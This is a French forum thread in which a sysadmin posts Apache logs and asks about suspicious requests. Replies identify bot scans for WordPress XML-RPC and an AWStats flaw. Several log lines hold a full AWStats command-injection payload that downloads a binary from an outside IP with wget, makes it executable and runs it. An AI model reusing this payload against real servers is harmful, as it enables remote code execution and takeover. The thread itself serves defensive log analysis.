Requêtes bizarres sur un serveur apache d'entreprise...logs inside.

Requêtes bizarres sur un serveur apache d'entreprise...logs inside. - réseaux et sécurité - Linux et OS Alternatifs

Marsh Posté le 10-11-2005 à 13:26:37    

:hello:  
 
Hello
 
En jetant un petit coup d'oeil a mes logs apache j'ai trouvé des requêtes étranges qui se répètent régulièrement....
ça peut correspondre à quoi? :heink:  Sachant que je n'ai pas d'alias ou répertoire typ blog/drupal/ phpgroupware .(j'ai bien un awstats par contre...)
 
Merci
 
Serveur apache2 sur une Fedora core 2
 

Code :
  1. 84.147.51.156 - - [10/Nov/2005:04:23:37 +0100] "POST /xmlrpc.php HTTP/1.1" 302 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  2. 84.147.51.156 - - [10/Nov/2005:04:23:39 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 302 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  3. 84.147.51.156 - - [10/Nov/2005:04:23:40 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 302 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  4. 84.147.51.156 - - [10/Nov/2005:04:23:41 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 302 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  5. 84.147.51.156 - - [10/Nov/2005:04:23:42 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  6. 84.147.51.156 - - [10/Nov/2005:04:23:44 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 302 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  7. 84.147.51.156 - - [10/Nov/2005:04:23:45 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 302 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  8. 84.147.51.156 - - [10/Nov/2005:04:23:46 +0100] "POST /xmlrpc.php HTTP/1.1" 302 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  9. 84.147.51.156 - - [10/Nov/2005:04:23:47 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  10. 84.147.51.156 - - [10/Nov/2005:04:23:49 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  11. 84.147.51.156 - - [10/Nov/2005:05:28:12 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 302 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  12. 84.147.51.156 - - [10/Nov/2005:05:28:13 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 302 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  13. 84.147.51.156 - - [10/Nov/2005:05:28:14 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 302 524 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  14. 84.147.51.156 - - [10/Nov/2005:05:28:16 +0100] "POST /xmlrpc.php HTTP/1.1" 302 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  15. 84.147.51.156 - - [10/Nov/2005:05:28:17 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 302 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  16. 84.147.51.156 - - [10/Nov/2005:05:28:18 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 302 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  17. 84.147.51.156 - - [10/Nov/2005:05:28:20 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 302 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  18. 84.147.51.156 - - [10/Nov/2005:05:28:21 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  19. 84.147.51.156 - - [10/Nov/2005:05:28:23 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 302 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  20. 84.147.51.156 - - [10/Nov/2005:05:28:24 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 302 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  21. 84.147.51.156 - - [10/Nov/2005:05:28:26 +0100] "POST /xmlrpc.php HTTP/1.1" 302 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  22. 84.147.51.156 - - [10/Nov/2005:05:28:27 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  23. 84.147.51.156 - - [10/Nov/2005:05:28:28 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  24. 84.147.51.156 - - [10/Nov/2005:05:50:04 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 302 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  25. 84.147.51.156 - - [10/Nov/2005:05:50:05 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 302 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  26. 84.147.51.156 - - [10/Nov/2005:05:50:06 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 302 524 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  27. 84.147.51.156 - - [10/Nov/2005:05:50:08 +0100] "POST /xmlrpc.php HTTP/1.1" 302 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  28. 84.147.51.156 - - [10/Nov/2005:05:50:09 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 302 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  29. 84.147.51.156 - - [10/Nov/2005:05:50:10 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 302 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  30. 84.147.51.156 - - [10/Nov/2005:05:50:12 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 302 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  31. 84.147.51.156 - - [10/Nov/2005:05:50:13 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  32. 84.147.51.156 - - [10/Nov/2005:05:50:14 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 302 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  33. 84.147.51.156 - - [10/Nov/2005:05:50:16 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 302 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  34. 84.147.51.156 - - [10/Nov/2005:05:50:17 +0100] "POST /xmlrpc.php HTTP/1.1" 302 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  35. 84.147.51.156 - - [10/Nov/2005:05:50:18 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  36. 84.147.51.156 - - [10/Nov/2005:05:50:20 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Reply

Marsh Posté le 10-11-2005 à 13:26:37   

Reply

Marsh Posté le 10-11-2005 à 13:29:39    

des bots qui essayent de trouver des sites avec certains "package" contenant des failles...
Tu t'en fous, tant que tu n'as pas installé ces forums/blogs/ ou autres...

Reply

Marsh Posté le 10-11-2005 à 13:30:18    

là en l'occurence il s'agit de wordpress et d'une faille d'awstats

Reply

Marsh Posté le 10-11-2005 à 13:50:11    

Merci
 
Je viens de comprendre un peu en cherchant,et donc de sortir de mon monde de bisounours, je savais même pas qu'il y avait des attaques en chaîne sur les serveur web (de petites boîtes....)
 
En remontant les logs j'en trouve plein d'autres (exploitation de faille IIS :ange: ).
 
Généralement ce sont des machines infectées  ou des types qui s'amusent? (les 2 sans doute?)
 
 
 
J'ai ça dans aw-stats:
 allow from 127.0.0.1
plus un petit update  
ça doit suffire? nan?
 
(le code http 302 c'est found mais le 516 à côté c'est quoi??)

Reply

Marsh Posté le 10-11-2005 à 13:52:58    

Je crois que c'est la taille de la requete (de mémoire). Les formats des logs sont définis quelques part, me rappelle plus où par contre.

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed